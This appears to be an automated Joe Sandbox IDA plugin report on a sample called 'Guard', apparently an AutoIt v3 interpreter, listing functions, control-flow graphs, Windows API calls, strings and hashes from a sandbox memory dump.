                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                          • String ID:
                                                                                          • API String ID: 48322524-0
                                                                                          • Opcode ID: 69f1506d2ffc60010f7ec4296346e985158610a8239a868a7f7cbec8eddeee7b
                                                                                          • Instruction ID: c4092c1a08cce1f33020f1a4a3b257b7a00562d4407cbafdc4d7451a73023f38
                                                                                          • Opcode Fuzzy Hash: 69f1506d2ffc60010f7ec4296346e985158610a8239a868a7f7cbec8eddeee7b
                                                                                          • Instruction Fuzzy Hash: 8DE0DF31810606AB8224BB7CEC0D8EBB75C9E0A339F100715F935C20E0FB7099548796
                                                                                          Function 00A329BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 634 a329be-a329e1 635 a6fd14-a6fd27 call a7ff5c 634->635 636 a329e7-a32a19 call a33df7 call a33e47 634->636 642 a6fd2e-a6fd43 call a7ff5c 635->642 643 a32a1e-a32a20 636->643 650 a6fd48-a6fd50 642->650 643->642 645 a32a26-a32a9b call a31207 call a40b8b call a31207 call a40284 call a33ea1 call a3410a 643->645 645->650 653 a32aa1-a32b10 call a31207 * 2 call a40119 call a317e0 SetCurrentDirectoryW call a31cb6 * 2 call a40fe6 call a3433f 645->653 652 a6fd56-a6fd80 call a342cf call a349c2 650->652 650->653 667 a6fd82-a6fd9c call a89b16 652->667 668 a6fda3-a6fdba call a7ff5c 652->668 707 a32b14-a32b19 653->707 681 a6fd9e call a34a2f 667->681 682 a6fdbf-a6fe01 call a34a2f call a40fe6 667->682 679 a32c4c-a32c7e call a31cb6 * 2 call a33e25 668->679 681->668 698 a6fe14-a6fe16 682->698 699 a6fe03-a6fe12 682->699 702 a6fe1a-a6fe52 call a33613 call a3343f 698->702 699->702 712 a70032-a7006a call a33613 call a8789a call a8fc0d call a42f85 702->712 713 a6fe58 702->713 709 a32c19-a32c3c call a342cf SetCurrentDirectoryW 707->709 710 a32b1f-a32b28 call a33ebe 707->710 709->679 722 a32c3e-a32c4b call a4105c * 2 709->722 719 a32b2d-a32b2f 710->719 753 a7006c-a7007f call a33546 call a771dc 712->753 717 a6fe5c-a6fe87 call a33613 call a879a4 713->717 739 a6fea1-a6feac call a8798e 717->739 740 a6fe89-a6fe9c 717->740 719->709 723 a32b35-a32b51 call a32e8f call a32dfe 719->723 722->679 741 a32b57-a32b6e call a32edc call a42e2c 723->741 742 a700d0-a700e8 call a7ff5c 723->742 754 a6feae-a6fec8 739->754 755 a6fecd-a6fed8 call a87978 739->755 744 a6ffc1 740->744 767 a32b70-a32b87 call a4386d 741->767 768 a32b8d-a32b92 741->768 742->709 746 a6ffc5-a6ffdc call a3343f 744->746 746->717 761 a6ffe2-a6ffe8 746->761 753->679 754->744 770 a6fef2-a6fefd call a3368b 755->770 771 a6feda-a6feed 755->771 765 a6ffea-a6fff5 761->765 766 a70018-a7001a call a8045f 761->766 765->766 773 a6fff7-a70016 call a3314d 765->773 783 a7001f-a7002c 766->783 767->768 788 a32c81-a32c8b 767->788 777 a700c3-a700cb call a7fdb2 768->777 778 a32b98-a32bd8 call a31a36 call a327fc call a31cb6 768->778 770->746 785 a6ff03-a6ff1d call a7fef8 770->785 771->744 773->783 777->742 803 a32bde-a32be1 778->803 804 a32cac-a32cb0 778->804 783->712 783->713 797 a6ff1f-a6ff4a call a31a36 call a31cb6 785->797 798 a6ff4c-a6ff4f 785->798 788->768 792 a32c91-a700be 788->792 792->768 834 a6ff70-a6ff81 call a33613 797->834 801 a6ff83-a6ff86 798->801 802 a6ff51-a6ff6f call a31a36 call a32759 call a31cb6 798->802 806 a6ffaa-a6ffae call a8793a 801->806 807 a6ff88-a6ff91 call a7fe19 801->807 802->834 809 a32be7-a32bea 803->809 810 a32c9f-a32ca7 803->810 804->810 814 a6ffb3-a6ffc0 call a4105c 806->814 826 a6ff97-a6ffa5 call a4105c 807->826 827 a70084-a700b0 call a7ff5c call a4105c call a42f85 807->827 816 a32bf0-a32bff call a3314d 809->816 817 a32c96-a32c99 809->817 820 a32c04-a32c13 810->820 814->744 816->820 817->810 825 a32c9b 817->825 820->707 820->709 825->810 826->717 827->753 834->814
                                                                                          APIs
                                                                                            • Part of subcall function 00A40B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A32A3E,?,00008000), ref: 00A40BA7
                                                                                            • Part of subcall function 00A40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A32A58,?,00008000), ref: 00A402A4
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A32ADF
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00A32C2C
                                                                                            • Part of subcall function 00A33EBE: _wcscpy.LIBCMT ref: 00A33EF6
                                                                                            • Part of subcall function 00A4386D: _iswctype.LIBCMT ref: 00A43875
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                          • API String ID: 537147316-3738523708
                                                                                          • Opcode ID: ddc21af296d14e4c408d5bebcb5cc8f7f0176eb5466a65294b705c17e221e1e6
                                                                                          • Instruction ID: 16f5d4861977084ad9af50914e3f2509f827ac64deced84202aeb23dcf2a4909
                                                                                          • Opcode Fuzzy Hash: ddc21af296d14e4c408d5bebcb5cc8f7f0176eb5466a65294b705c17e221e1e6
                                                                                          • Instruction Fuzzy Hash: 43029F711083419FC724EF24C981AAFBBF5EF99354F10492DF499972A2DB30DA49CB52
                                                                                          Function 00A32FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00A400CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A33094), ref: 00A400ED
                                                                                            • Part of subcall function 00A408C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A3309F), ref: 00A408E3
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A330E2
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A701BA
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A701FB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00A70239
                                                                                          • _wcscat.LIBCMT ref: 00A70292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                          • API String ID: 2673923337-2727554177
                                                                                          • Opcode ID: ecc21fb24f9637e0db3c03907b336ae05d008c70fb89ab110ddbf0d99372ca74
                                                                                          • Instruction ID: 0151ee9ffa113f3db4c992067843e859106ad59c3eb288dad1dad2b7baf6014d
                                                                                          • Opcode Fuzzy Hash: ecc21fb24f9637e0db3c03907b336ae05d008c70fb89ab110ddbf0d99372ca74
                                                                                          • Instruction Fuzzy Hash: B1718E724093419EC704EFA5DD819ABBBE8FF84340F40492EF6599B1A1EF349949CB52
                                                                                          Function 00A34D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 974 a34d83-a34dd1 976 a34dd3-a34dd6 974->976 977 a34e31-a34e33 974->977 979 a34e37 976->979 980 a34dd8-a34ddf 976->980 977->976 978 a34e35 977->978 983 a34e1a-a34e22 DefWindowProcW 978->983 984 a709c2-a709f0 call a2c460 call a2c483 979->984 985 a34e3d-a34e40 979->985 981 a34de5-a34dea 980->981 982 a34ead-a34eb5 PostQuitMessage 980->982 986 a70a35-a70a49 call a82cce 981->986 987 a34df0-a34df2 981->987 990 a34e61-a34e63 982->990 989 a34e28-a34e2e 983->989 1019 a709f5-a709fc 984->1019 991 a34e42-a34e43 985->991 992 a34e65-a34e8c SetTimer RegisterWindowMessageW 985->992 986->990 1010 a70a4f 986->1010 993 a34eb7-a34ec1 call a35b29 987->993 994 a34df8-a34dfd 987->994 990->989 998 a70965-a70968 991->998 999 a34e49-a34e5c KillTimer call a35ac3 call a234e4 991->999 992->990 995 a34e8e-a34e99 CreatePopupMenu 992->995 1012 a34ec6 993->1012 1000 a34e03-a34e08 994->1000 1001 a70a1a-a70a21 994->1001 995->990 1005 a7099e-a709bd MoveWindow 998->1005 1006 a7096a-a7096c 998->1006 999->990 1008 a34e9b-a34eab call a35bd7 1000->1008 1009 a34e0e-a34e14 1000->1009 1001->983 1016 a70a27-a70a30 call a78854 1001->1016 1005->990 1013 a7096e-a70971 1006->1013 1014 a7098d-a70999 SetFocus 1006->1014 1008->990 1009->983 1009->1019 1010->983 1012->990 1013->1009 1020 a70977-a70988 call a2c460 1013->1020 1014->990 1016->983 1019->983 1024 a70a02-a70a15 call a35ac3 call a359d3 1019->1024 1020->990 1024->983
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A34E22
                                                                                          • KillTimer.USER32(?,00000001), ref: 00A34E4C
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A34E6F
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A34E7A
                                                                                          • CreatePopupMenu.USER32 ref: 00A34E8E
                                                                                          • PostQuitMessage.USER32(00000000), ref: 00A34EAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: efc606847d00bac60b101fe3b659a91087ed261a50a2d9fed41b604dbfef1cd8
                                                                                          • Instruction ID: dd2db9c26a5b5f785e5f8dbc5cfc8db096c7aa886ec63f4dd5f5c449e1fdcc2f
                                                                                          • Opcode Fuzzy Hash: efc606847d00bac60b101fe3b659a91087ed261a50a2d9fed41b604dbfef1cd8
                                                                                          • Instruction Fuzzy Hash: 33416B31208246ABEB11AFB8ED4DFFF76A5F758300F200225F645951E2DB78BC519761
                                                                                          Function 00A350DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1184 a350db-a3514b CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A35109
                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A3512A
                                                                                          • ShowWindow.USER32(00000000), ref: 00A3513E
                                                                                          • ShowWindow.USER32(00000000), ref: 00A35147
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateShow
                                                                                          • String ID: AutoIt v3$edit
                                                                                          • API String ID: 1584632944-3779509399
                                                                                          • Opcode ID: 30ea01e8bcc45400f8d8e89628402ba3941532d68ce6b7a23195930eb390b19b
                                                                                          • Instruction ID: c56dbfea77d030486ea529916caa923529f405989accc052b1bfd77644014546
                                                                                          • Opcode Fuzzy Hash: 30ea01e8bcc45400f8d8e89628402ba3941532d68ce6b7a23195930eb390b19b
                                                                                          • Instruction Fuzzy Hash: FCF0DA715452D47EEA319BA76C8CEAB6E7DE7C6F50F00011EBA00AA1B1C6611892DBB0
                                                                                          Function 00A84148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8416D
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00A8417B
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00A8419B
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A84245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 420147892-0
                                                                                          • Opcode ID: dc78f777e189a036c01d28181f881491554b28ed5018c9ed09f53cfa8ca72501
                                                                                          • Instruction ID: 7119c766ad4aaea26b60d5822be1228b68218ed7a8572de93e10344c76d005d6
                                                                                          • Opcode Fuzzy Hash: dc78f777e189a036c01d28181f881491554b28ed5018c9ed09f53cfa8ca72501
                                                                                          • Instruction Fuzzy Hash: F13180711083429FD304EF94D885AAFBBE8BF99350F400A2DF585C61A1EB719A49CB52
                                                                                          Function 00A3278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00A349C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A327AF,?,00000001), ref: 00A349F4
                                                                                          • _free.LIBCMT ref: 00A6FB04
                                                                                          • _free.LIBCMT ref: 00A6FB4B
                                                                                            • Part of subcall function 00A329BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A32ADF
                                                                                          Strings
                                                                                          • Bad directive syntax error, xrefs: 00A6FB33
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                          • String ID: Bad directive syntax error
                                                                                          • API String ID: 2861923089-2118420937
                                                                                          • Opcode ID: 9dfeaa746b36ab2b7b2c6a364bff848ebc702f12a2f4e45b762f6a8dc4b52804
                                                                                          • Instruction ID: 2509e99db7fbc0e528ebcdf90772d7eb892184293fa0e400014a09811623383e
                                                                                          • Opcode Fuzzy Hash: 9dfeaa746b36ab2b7b2c6a364bff848ebc702f12a2f4e45b762f6a8dc4b52804
                                                                                          • Instruction Fuzzy Hash: F4919F71914219AFCF04EFA4DD919EEB7B4FF19350F14456AF816AB2A1DB30AE04CB50
                                                                                          Function 00A320E0 Relevance: 4.9, APIs: 3, Instructions: 422COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4d6b8b05d1b610b370a52be14f4f0fe476399a7f9d04eb5ced019ef8b34d0df
                                                                                          • Instruction ID: e5340115026d2a001d96f5aa98b54f815797bca356902bfbf878af3d0cc4a1c8
                                                                                          • Opcode Fuzzy Hash: b4d6b8b05d1b610b370a52be14f4f0fe476399a7f9d04eb5ced019ef8b34d0df
                                                                                          • Instruction Fuzzy Hash: 6AF1BB71E04219EBCF14DF98D981AFEB7B5FF48700F50812AF816AB291DB349A51CB91
                                                                                          Function 00A2AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A407EC
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A407F4
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A407FF
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A4080A
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A40812
                                                                                            • Part of subcall function 00A407BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4081A
                                                                                            • Part of subcall function 00A3FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A2AC6B), ref: 00A3FFA7
                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A2AD08
                                                                                          • OleInitialize.OLE32(00000000), ref: 00A2AD85
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A62F56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1986988660-0
                                                                                          • Opcode ID: 6e076d7dd8480a4399cf936d2f986e0a64081cbb7cd0c466531fa1be6d5f4f40
                                                                                          • Instruction ID: 61345bce980f01fe7da1782a81a0361bd097e68bb483cd38eb5a1974745befed
                                                                                          • Opcode Fuzzy Hash: 6e076d7dd8480a4399cf936d2f986e0a64081cbb7cd0c466531fa1be6d5f4f40
                                                                                          • Instruction Fuzzy Hash: B681AAB09082C18EC395EFA9BDD4A5D7FE9EB89304710856AE419CF2B2EB3044079F61
                                                                                          Function 00A348B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID: EA06
                                                                                          • API String ID: 4104443479-3962188686
                                                                                          • Opcode ID: 476024823008af9b02941ed1158dd5c5334c7645a31c10873e38be1f7d2ae35f
                                                                                          • Instruction ID: 3d5f179e796176efb8113b56c25b3c078a060f4f149d4899b6d34cd9ff2d5b69
                                                                                          • Opcode Fuzzy Hash: 476024823008af9b02941ed1158dd5c5334c7645a31c10873e38be1f7d2ae35f
                                                                                          • Instruction Fuzzy Hash: 3B419E31E042589BDF219B648D51BBF7FB58B4E310F588075F8C6EB286C624AD8483E2
                                                                                          Function 00A9E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _strcat.LIBCMT ref: 00A9E20C
                                                                                            • Part of subcall function 00A24D37: __itow.LIBCMT ref: 00A24D62
                                                                                            • Part of subcall function 00A24D37: __swprintf.LIBCMT ref: 00A24DAC
                                                                                          • _wcscpy.LIBCMT ref: 00A9E29B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1012013722-0
                                                                                          • Opcode ID: 46d98fdce37f92dd37ed60bb5ff472b5c60bb804f89f29c4a1d40d23c2f7b11a
                                                                                          • Instruction ID: 58b70ed7183a74eaedc2a744942f5acd2f13944cdba9768a499ce1cb10246149
                                                                                          • Opcode Fuzzy Hash: 46d98fdce37f92dd37ed60bb5ff472b5c60bb804f89f29c4a1d40d23c2f7b11a
                                                                                          • Instruction Fuzzy Hash: 0F910835B00514DFCB18DF28D5819AABBF5FF59310B95806AE81A8F366EB30ED51CB81
                                                                                          Function 00A342F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00A33E72,?,?,?,00000000), ref: 00A34327
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00A33E72,?,?,?,00000000), ref: 00A70717
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: e0025e3b8d1f533f15006673b76f6108c39efdb9fc6f6ea39b2847c3344dc601
                                                                                          • Instruction ID: 233f25e9878bf784fad7c05ebadf829fb806a50a50e48d9d7121c17b4c97ac8d
                                                                                          • Opcode Fuzzy Hash: e0025e3b8d1f533f15006673b76f6108c39efdb9fc6f6ea39b2847c3344dc601
                                                                                          • Instruction Fuzzy Hash: F2015270284309BEF3245F68DC8AF667A9CEB05768F10C319FAE56E1E1C6B56C858B14
                                                                                          Function 00A40FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
